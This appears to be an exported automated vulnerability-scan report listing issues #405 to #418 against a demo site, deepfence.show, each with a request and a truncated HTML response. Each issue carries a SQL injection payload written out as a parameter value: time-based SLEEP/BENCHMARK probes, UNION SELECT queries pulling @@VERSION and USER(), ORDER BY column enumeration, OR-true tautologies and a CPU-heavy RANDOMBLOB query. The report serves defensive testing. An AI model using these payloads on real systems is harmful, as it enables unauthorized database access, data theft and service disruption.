href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #405\nScan SQL InjectionSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('\nA')),4,5,6--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #406\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io admin\") or (\"1\"=\"1\"--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #407\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT @@VERSION,USER(),SLEEP(5),\nBENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,\nNULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #408\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\ndemouser@\ndeepfence.ioAND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(\n88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)\n+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+\nCHAR(107)))#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #409\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io&&SLEEP(5)--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCgAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #410\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io AND 2947=LIKE('ABCDEFG',UPPER(HEX(\nRANDOMBLOB(1000000000/2))))\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #411\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Valuedemouser@\ndeepfence.io' or '' '\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #412\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 6--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #413\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #414\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 19--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #415\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 22#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #416Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioAND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+\nCHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+\nCHAR(116)))\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #417\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A\n')),4,5,6,7--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script language=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #418\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioOR x=y--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" 